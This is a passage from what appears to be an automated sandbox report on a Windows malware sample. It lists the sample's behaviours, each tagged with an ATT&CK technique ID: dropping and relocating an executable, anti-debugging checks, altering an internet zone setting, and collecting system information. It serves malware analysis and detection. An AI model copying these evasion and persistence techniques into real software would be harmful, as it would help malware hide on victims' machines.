\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\ctbzjelz.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ctbzjelz.exe.67EE49B3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ctbzjelz.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ctbzjelz.exe]- [targetUID: 00000000-00004704]\n \"CTBZJELZ.EXE.67EE49B4.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ctbzjelz.exe.67EE49B3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ctbzjelz.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ctbzjelz.exe]- [targetUID: 00000000-00004704]\n \"CTBZJELZ.EXE.67EE49B4.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\" to \"%WINDIR%\\system32\\fbjtauwa\\ctbzjelz.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-383681 [PID: 4812]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-1206876 [PID: 4812]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-2408817 [PID: 4812]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-2662959 [PID: 4812]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-3280186 [PID: 4812]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-3481195 [PID: 4812]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004812-00000105-3989351 [PID: 4812]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-71515 [PID: 2232]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6DDC0000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6DDC0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6DDC0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00004812-00000105-6066912", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" queries volume information of \"C:\\\" at 00000000-00003208-0000010C-1441299\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" queries volume information of \"C:\\\" at 00000000-00003208-0000010C-1442586\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1847603\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1848889\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-38440\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-1287186\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-2024037\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-2025795", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c89728003cfc2400145cb877435cb87708fd2400010000009401260001000000bcfb2400935cb9774083c077d4a0b8777c44fd7708fd24000100000001000000e8ef2800000000008cfb2400bcfb240028fc240095e1b47738bb6100feffffffd4a0b8771bbed0750000157700000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cb7774379d075ffffffff0c0000004c62b7771f79d075ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea2c77ecf91200b344916a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40003ebfa9bcbcf51200616b400088000000f822410081a82c77ecf912000000900100eecd000002000008000000282b5f00 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebfb7570292e0000c0fd7f9a5cb97700e0fd7fb0c96e0144c0fd7f00000000400000003f0000002500000000c0fd7fa4c96e01c15cb9776082c0772500000000c0fd7f9a5cb97700e0fd7fc8c96e015789b8778083c0771317d175d8ebfb75 (UID: 00000000-00003208)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000068de2b004cfa5600145cb877435cb87718fb5600010000009401290001000000ccf95600935cb9774083c077d4a0b877e5108f7718fb5600010000000100000060e42b00000000009cf95600ccf9560038fa560095e1b477d1ed6100feffffffd4a0b8771bbed0750000157700000000 (UID: 00000000-00003260)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000b8de2700b4f92100145cb877435cb87780fa210001000000940125000100000034f92100935cb9774083c077d4a0b877920df87780fa2100010000000100000048e427000000000004f9210034f92100a0f9210095e1b4775ef06100feffffffd4a0b8771bbed0750000157700000000 (UID: 00000000-00004664)\n \"ctbzjelz.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc31003cfc2400145cb877435cb87708fd24000100000094012f0001000000bcfb2400935cb9774083c077d4a0b8779e00fd7708fd2400010000000100000008ea3100000000008cfb2400bcfb240028fc240095e1b477daff6100feffffffd4a0b8771bbed0750000157700000000 (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" queries volume information of \"C:\\\" at 00000000-00003208-0000010C-1441299\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" queries volume information of \"C:\\\" at 00000000-00003208-0000010C-1442586\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1847603\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1848889\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-38440\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-1287186\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-2024037\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002232-0000010C-2025795", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003208)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003208)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00002972-12225-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004812)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000e8001c020000000000000000000000000000000000000500e3001c0200000000000000000000087026000000000020000000000000000000000098492800f86c2600186e2600b8d02800c071260000000000ccf924000000000028fc240095e1b477d0a36100feffffffff2bb8779a2ab87764c51a77b69fb877000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c51a77b8d0280064c51a77 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6100fce2120080f47c77000061000000000089f47c779a3adebc0200000070e312006ce3120064e2120068e2120018e4120095e1b477d0a36100c0e21200c83a867734e31200d58c7e7770e3120004e3120042a47c77a802867744e31200d2f47c77080000006ef57c7744f57c77223bdebc0200000070aadc6d0000130026bbdc6d18e31200020000000000130070aadc6d48e3120042a47c77a80286778ce3120010a9dc6d08000000e6a8dc6df88bd6bc0200000070aadc6d0000130026bbdc6dac0e6100780e610058e312008050e86d18e41200f9f2e06d9cc018d1 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000d7473f190300000044e56e01deaed5bd2c0c00008ce56e01c0e46e01590000000300000048e46e0150e46e0118e66e01d0bb926aeada2fd6feffffff98e56e01bfe5916ad7473f1998e56e01cce5916a060000000000116b01000000dfe5916a3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56e01000000008e00000044e66e01feffffffcce56e01cf00b977d600b9770c5ab7768e0000004700000044e66e0100000000a0e56e010000000008e66e01 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ca8497bd44de6e016d824177cc562e0004010000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000390035003600640064003200370033006500390030006500390039006100300064006300300061003400300036003700370032003100340062003800390036006600310061003300380064006500340065003500660034006100320065006300610031002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bb8773077b776d8ebfb75ac0126000000260000000000000000000300ed00c9000000000000000000000000000000000000000400e800c900000000000000000000000870260000000000200000000000000000000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600e8d23000000000003e00003e340000c010d5300088e8300030863000f00100000000260004000000e8d23000acee6e010464b87738012600e063b8776c51b7760000000000002600f0d230006dd12c77278ba7bd6cae14760000000000000000f001000088e83000d82f26000100000000002600500126000c000000f0d23000d82f26000200000218000000ec2000cc820000000000000000000000030000004cee6e01820000007f07000000000000ec2000cc02000000c075347788e8300000000000c075347768ee6e01e830260000000000d82f2600c0ee6e01ff2bb877 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000006cd87c820300000044e56e01deaed5bdbc1000008ce56e01c0e46e015b0000000300000048e46e0150e46e0118e66e01d0bb926aeada2fd6feffffff98e56e01bfe5916a6cd87c8298e56e01cce5916a820500000000116b01000000dfe5916a3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600c8cd30000000000060000060340000c0f0cf300010ea3000f0213100000300000000260010000000c8cd3000acee6e010464b87738012600e063b8776c51b7760000000000002600d0cd30006dd12c77278ba7bd6cae14760000000000000000fc00000010ea3000d82f26000100000000002600500126000c000000d0cd3000d82f26000200000218000000bf0200bda40000000000000000000000030000004cee6e01a40000003f02000000000000923a00a824000000c0753477583b320000000000c075347768ee6e014030260000000000d82f2600c0ee6e01ff2bb877 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000db21ef9d0300000044e56e01deaed5bd0c0b00008ce56e01c0e46e015b0000000300000048e46e0150e46e0118e66e01d0bb926aeada2fd6feffffff98e56e01bfe5916adb21ef9d98e56e01cce5916a820500000000116b01000000dfe5916a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00003208)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"IsWow64Process\" with parameter \"3208\" - (UID: 00000000-00003208)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"ctbzjelz.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004812)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00003208)\n \"cmd.exe\" called \"FindNextFileW\" with parameter ctbzjelz.exe (UID: 00000000-00004704)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": 